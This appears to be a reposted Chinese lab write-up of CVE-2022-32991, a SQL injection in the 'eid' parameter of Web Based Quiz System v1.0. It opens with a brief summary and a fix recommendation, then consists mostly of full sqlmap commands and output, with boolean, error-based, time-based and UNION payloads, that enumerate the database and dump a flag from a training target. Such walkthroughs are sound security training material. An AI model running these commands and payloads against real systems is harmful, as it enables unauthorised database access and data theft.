Web Based Quiz System v1.0 SQL 注入漏洞(CVE-2022-32991)

news2024/11/24 8:04:38

前言

CVE-2022-32991 是一个影响 Web Based Quiz System v1.0 的 SQL 注入漏洞。这个漏洞存在于 welcome.php 文件中的 eid 参数处。攻击者可以通过此漏洞在数据库中执行任意 SQL 语句,从而获取、修改或删除数据库中的数据。

具体细节如下:

  • 攻击向量:网络(NETWORK)
  • 攻击复杂度:低(LOW)
  • 所需权限:低(LOW)
  • 用户交互:无(NONE)
  • 影响:高(机密性、完整性、可用性均受影响)

根据 CVSS v3 的评分,该漏洞的基础得分为 8.8(高),而在 CVSS v2 中,该漏洞的评分为 6.5(中)。这表明该漏洞在被利用时会对系统造成严重影响。

漏洞的主要原因是没有正确地对输入进行过滤和转义,从而使得恶意用户能够插入和执行恶意的 SQL 语句。为了防止这种类型的攻击,应确保在处理用户输入时使用预编译语句(prepared statements)或存储过程,并严格验证和转义所有用户输入。

春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:

  1. 实战演练

    • 提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
    • 场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。
  2. 漏洞复现

    • 用户可以通过平台对已知的安全漏洞进行复现,了解漏洞的产生原因、利用方法和修复措施。
    • 通过实战操作,帮助用户掌握漏洞利用和防护的技能。
  3. 教学培训

    • 提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。
    • 包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。
  4. 竞赛与评测

    • 定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。
    • 提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。
  5. 资源共享

    • 平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。
    • 用户可以在社区中分享经验和资源,互相交流和学习。

春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

漏洞复现

打开靶场

点击按钮注册

填写表格后提交 

使用刚注册的账号登录 

点击图中任意按钮跳转

发现了参数 eid(这三个页面的 eid 都不相同,最后两个页面的 n 和 t 相同)

打开 BurpSuite 拦截抓包

保存下值方便绕过身份验证

Cookie: PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

使用工具 SQLMap 开始渗透:

──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10" -p "eid" -A "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" --cookie="PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v" --batch --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:03:02 /2024-06-29/

[19:03:03] [INFO] testing connection to the target URL
[19:03:03] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:03:03] [INFO] testing if the target URL content is stable
[19:03:03] [INFO] target URL content is stable
[19:03:03] [INFO] heuristic (basic) test shows that GET parameter 'eid' might be injectable (possible DBMS: 'MySQL')
[19:03:03] [INFO] heuristic (XSS) test shows that GET parameter 'eid' might be vulnerable to cross-site scripting (XSS) attacks
[19:03:03] [INFO] testing for SQL injection on GET parameter 'eid'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[19:03:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:03:04] [WARNING] reflective value(s) found and filtering out
[19:03:04] [INFO] GET parameter 'eid' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="How")
[19:03:04] [INFO] testing 'Generic inline queries'
[19:03:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:03:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:03:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:03:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:03:04] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[19:03:04] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[19:03:04] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:03:05] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:03:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:03:05] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:03:05] [INFO] GET parameter 'eid' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[19:03:05] [INFO] testing 'MySQL inline queries'
[19:03:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[19:03:05] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)                                                                
[19:03:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[19:03:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[19:03:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[19:03:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[19:03:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[19:03:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:03:16] [INFO] GET parameter 'eid' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[19:03:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:03:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:03:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:03:16] [INFO] target URL appears to have 5 columns in query
[19:03:16] [INFO] GET parameter 'eid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'eid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=quiz&step=2&eid=5b141f1e8399e' AND 5842=5842 AND 'MgXN'='MgXN&n=1&t=10

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 4259 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(4259=4259,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jSAZ'='jSAZ&n=1&t=10

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 5713 FROM (SELECT(SLEEP(5)))hPwD) AND 'Axps'='Axps&n=1&t=10

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x4e53655379747457697341656d4947514679754258475243444b796944444e45576344537274507a,0x716b787a71),NULL,NULL,NULL-- -&n=1&t=10
---
[19:03:16] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:03:16] [INFO] fetching database names
[19:03:17] [INFO] retrieved: 'information_schema'
[19:03:17] [INFO] retrieved: 'performance_schema'
[19:03:17] [INFO] retrieved: 'mysql'
[19:03:17] [INFO] retrieved: 'ctf'
available databases [4]:                                                                                                                                               
[*] ctf
[*] information_schema
[*] mysql
[*] performance_schema

[19:03:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com'

[*] ending @ 19:03:17 /2024-06-29/

                                                                                                                                                                        
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10" -p "eid" -A "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" --cookie="PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v" --batch -D "ctf" --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:05:38 /2024-06-29/

[19:05:38] [INFO] resuming back-end DBMS 'mysql' 
[19:05:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=quiz&step=2&eid=5b141f1e8399e' AND 5842=5842 AND 'MgXN'='MgXN&n=1&t=10

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 4259 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(4259=4259,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jSAZ'='jSAZ&n=1&t=10

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 5713 FROM (SELECT(SLEEP(5)))hPwD) AND 'Axps'='Axps&n=1&t=10

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x4e53655379747457697341656d4947514679754258475243444b796944444e45576344537274507a,0x716b787a71),NULL,NULL,NULL-- -&n=1&t=10
---
[19:05:39] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:05:39] [INFO] fetching tables for database: 'ctf'
[19:05:39] [WARNING] reflective value(s) found and filtering out
[19:05:39] [INFO] retrieved: 'user'
[19:05:39] [INFO] retrieved: 'options'
[19:05:39] [INFO] retrieved: 'quiz'
[19:05:40] [INFO] retrieved: 'admin'
[19:05:40] [INFO] retrieved: 'questions'
[19:05:40] [INFO] retrieved: 'history'
[19:05:40] [INFO] retrieved: 'rank'
[19:05:40] [INFO] retrieved: 'flag'
[19:05:40] [INFO] retrieved: 'answer'
Database: ctf                                                                                                                                                          
[9 tables]
+-----------+
| admin     |
| history   |
| options   |
| rank      |
| user      |
| answer    |
| flag      |
| questions |
| quiz      |
+-----------+

[19:05:40] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com'

[*] ending @ 19:05:40 /2024-06-29/

                                                                                                                                                                        
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10" -p "eid" -A "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" --cookie="PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v" --batch -D "ctf" -T "flag" --columns
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.4#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:06:22 /2024-06-29/

[19:06:22] [INFO] resuming back-end DBMS 'mysql' 
[19:06:23] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=quiz&step=2&eid=5b141f1e8399e' AND 5842=5842 AND 'MgXN'='MgXN&n=1&t=10

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 4259 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(4259=4259,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jSAZ'='jSAZ&n=1&t=10

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 5713 FROM (SELECT(SLEEP(5)))hPwD) AND 'Axps'='Axps&n=1&t=10

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x4e53655379747457697341656d4947514679754258475243444b796944444e45576344537274507a,0x716b787a71),NULL,NULL,NULL-- -&n=1&t=10
---
[19:06:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:06:23] [INFO] fetching columns for table 'flag' in database 'ctf'
[19:06:23] [WARNING] reflective value(s) found and filtering out
Database: ctf
Table: flag
[1 column]
+--------+---------------+
| Column | Type          |
+--------+---------------+
| flag   | varchar(1024) |
+--------+---------------+

[19:06:23] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com'

[*] ending @ 19:06:23 /2024-06-29/

                                                                                                                                                                        
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10" -p "eid" -A "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" --cookie="PHPSESSID=n7dbtr2285k87o9dalp3ldfa9v" --batch -D "ctf" -T "flag" -C "flag" --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.4#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:07:10 /2024-06-29/

[19:07:10] [INFO] resuming back-end DBMS 'mysql' 
[19:07:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=quiz&step=2&eid=5b141f1e8399e' AND 5842=5842 AND 'MgXN'='MgXN&n=1&t=10

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=5b141f1e8399e' OR (SELECT 4259 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(4259=4259,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jSAZ'='jSAZ&n=1&t=10

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=5b141f1e8399e' AND (SELECT 5713 FROM (SELECT(SLEEP(5)))hPwD) AND 'Axps'='Axps&n=1&t=10

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: q=quiz&step=2&eid=5b141f1e8399e' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x4e53655379747457697341656d4947514679754258475243444b796944444e45576344537274507a,0x716b787a71),NULL,NULL,NULL-- -&n=1&t=10
---
[19:07:10] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.2.20
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:07:10] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'
[19:07:10] [WARNING] reflective value(s) found and filtering out
Database: ctf
Table: flag
[1 entry]
+--------------------------------------------+
| flag                                       |
+--------------------------------------------+
| flag{7ba28499-362a-43b4-be35-1f92bae73ef5} |
+--------------------------------------------+

[19:07:10] [INFO] table 'ctf.flag' dumped to CSV file '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com/dump/ctf/flag.csv'
[19:07:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze8l5ih2px68ljzcjuh.cloudeci1.ichunqiu.com'

[*] ending @ 19:07:10 /2024-06-29/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1879743.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Websocket解析及用法(封装一个通用订阅发布主题的webSocket类)

1、什么是WebSocket? websocket的目标是通过一个长连接实现与服务器全双工&#xff0c;双向的通信。是一种在单个TCP连接上进行全双工通信的协议&#xff0c;使得客户端和服务器之间的数据交换变得更加简单&#xff0c;允许服务端主动向客户端推送数据。在 js中创建websocket…

改机软件有哪些?实现一键新机、改串号、改IMEI和手机参数的需求 硬改手机软件,新机环境模拟 设备伪装,一键改机,一键复原

这次针对可以直接开端口修改参数的机型做一些工具解析 前面接触合作过很多工作室。其中很多工作室对于各自软件的跳验证有各自的需求。 一个机型各项参数一般有IMEI WiFi 蓝牙 sn psb ESN等等。 针对这些参数的修改首先要明白各自软件检测的具体是哪些参数来验证。 对于常用…

解决IDEA的Web项目右键无法创建Servlet问题

右键新建没有servlet? 在pom.xml文件中需要导入servlet依赖&#xff0c;很简单的&#xff0c;别担心&#xff0c;就20秒解决 看我操作&#xff01;&#xff01;&#xff01; 1. 找到自动生成的pom.xml文件 只要你创建了maven项目&#xff0c;就会自动生成pom.xml文件&#xf…

基于Java废物回收机构管理系统详细设计和实现(源码+LW+调试文档+讲解等)

&#x1f497;博主介绍&#xff1a;✌全网粉丝10W,CSDN作者、博客专家、全栈领域优质创作者&#xff0c;博客之星、平台优质作者、专注于Java、小程序技术领域和毕业项目实战✌&#x1f497; &#x1f31f;文末获取源码数据库&#x1f31f; 感兴趣的可以先收藏起来&#xff0c;…

python多继承的3C算法

python多继承的3C算法 有很多地方都说python多继承的继承顺序&#xff0c;是按照深度遍历的方式&#xff0c;其实python多继承顺序的算法&#xff0c;不是严格意义上的深度遍历&#xff0c;而是基于深度遍历基础上优化出一种叫3C算法 python多继承的深度遍历 class C:def ru…

Solidworke学习(齿轮绘画)

目录 一、齿轮的基础理论 二、齿轮啮合传动的条件 三、传送比 四、绘画齿轮的步骤 五、绘画齿数小的齿轮 学习链接&#xff1a;徒手画齿轮配合&#xff0c;solidworks超简单3D打印齿轮画法_哔哩哔哩_bilibili 一、齿轮的基础理论 齿轮的啮合通过渐开线之间的互相挤压实现…

【C++】C++ 超市会员卡管理系统(面向对象)(源码+数据)【独一无二】

&#x1f449;博__主&#x1f448;&#xff1a;米码收割机 &#x1f449;技__能&#x1f448;&#xff1a;C/Python语言 &#x1f449;公众号&#x1f448;&#xff1a;测试开发自动化【获取源码商业合作】 &#x1f449;荣__誉&#x1f448;&#xff1a;阿里云博客专家博主、5…

VRay是什么?有什么特点?渲染100邀请码1a12

Vray是由Chaos Group开发的高性能渲染引擎&#xff0c;能为不同的三维建模软件提供图像和动画渲染服务&#xff0c;它有以下几个特点。 1、Vray采用了先进的光线追踪技术&#xff0c;能够模拟真实世界中光线的传播和反射&#xff0c;生成的图像和动画十分逼真。 2、Vray提供了…

【C++】 ——【模板初阶】——基础详解

目录 1. 泛型编程 1.1 泛型编程的概念 1.2 泛型编程的历史与发展 1.3 泛型编程的优势 1.4 泛型编程的挑战 2. 函数模板 2.1 函数模板概念 2.2 函数模板格式 2.3 函数模板的原理 2.4 函数模板的实例化 2.5 模板参数的匹配原则 2.6 函数模板的特化 2.7 函数模板的使…

目前常见的几款企业级im即时通讯软件有哪些?

在目前的市场上&#xff0c;有几款常见的企业级即时通讯软件广受企业青睐。以下是其中几款主流企业级即时通讯软件的介绍和特点。 1. 微软Teams 微软Teams是一款集即时通讯、协作和视频会议功能于一体的企业级通讯软件。它提供了实时聊天、语音通话、视频会议、文件共享和团队…

账号和权限的管理1

文章目录 修改用户账号的属性usermod格式常用选项 用户账号的初始化配置文件文件来源主要的用户初始配置文件 组账号文件添加组账号groupadd格式常用选项其他选项 删除组账号groupdel格式 查询账号信息groups格式 id格式 finger格式 W、who、users格式 文件/目录的权限和归属访…

整车功能开发

整车功能开发 站在前人的肩膀上&#xff0c;从系统功能架构集成角度梳理下整车功能开发相关内容 1、整车功能开发相关文件介绍 1.1 配置表 上面的表格&#xff0c;是一种车辆特性的表达方式&#xff0c;其实比较传统&#xff0c;我们称之为配置表&#xff08;Feature list&a…

Python使用defaultdict简化值为list的字典

原始代码&#xff1a; from typing import Dictrelated_objects_for_fetch: Dict[str, list] {}for key, value in [(k1, v1), (k1, v2), (k2, v2), (k3, v3), (k2, v2)]:if key not in related_objects_for_fetch:related_objects_for_fetch[key] []if value not in (value…

AH1117-3.3芯片使用记录

今天在新做好的电路板上测试电源时发现一个问题&#xff0c;那就是散热端不能接地&#xff0c;接地了就好像短路一样&#xff0c;芯片会热的厉害&#xff0c;当我把该引脚与地的所有连接都切断后&#xff0c;短路现象消失&#xff0c;特此记录一下&#xff0c;防止自己下次再犯…

Shell脚本编程 — Shell Script

Shell脚本编程 — Shell Script 基本概念示例脚本示例1&#xff1a;备份文件示例2&#xff1a;监控磁盘使用情况示例3&#xff1a;批量重命名文件 运行脚本提示 Shell脚本是一种编程语言&#xff0c;主要用于在Unix/Linux系统中自动化执行任务。它通过编写一系列的命令来完成特…

49 - 列出指定时间段内所有的下单产品(高频 SQL 50 题基础版)

49 - 列出指定时间段内所有的下单产品 -- 指定2020年2月的方法 -- (1) order_date between 2020-02-01 and 2020-02-29 -- (2) order_date like 2020-02% -- (3) DATE_FORMAT(order_date, "%Y-%m") "2020-02" -- (4) LEFT(order_date, 7) 或 subst…

AI Agent:技术原理与未来趋势

在人工智能的快速发展中&#xff0c;AI Agent作为一项创新技术&#xff0c;正逐渐成为研究和应用的热点。AI Agent不仅仅是执行命令的程序&#xff0c;它们能够感知环境、做出决策并采取行动&#xff0c;展现出类似人类的群体协作能力。本文将探讨AI Agent的技术原理、开源框架…

解决idea中git无法管理项目中所有需要管理的文件

点击文件->设置 选择版本控制—>目录映射 点击加号 设置整个项目被Git管理

淘宝天猫小学升级复习学习资料怎么领取大额优惠券返利购物更省钱?

暑假是一个很好的机会来回顾和巩固过去一年里学到的知识。通过复习学习资料&#xff0c;孩子可以加深对基础知识的理解和记忆&#xff0c;为下一学年的学习打下坚实的基础。对于即将升入更高年级的孩子来说&#xff0c;他们可能会面临更加复杂和深入的学习内容。购买升学复习资…

图灵虚拟机配置

导入虚拟机 点击新建&#xff0c;选择虚拟硬盘文件 环境机器.vmdk 配置网络